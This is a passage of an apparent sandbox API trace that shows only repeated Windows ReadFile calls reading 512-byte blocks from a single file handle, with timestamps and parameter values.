lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | 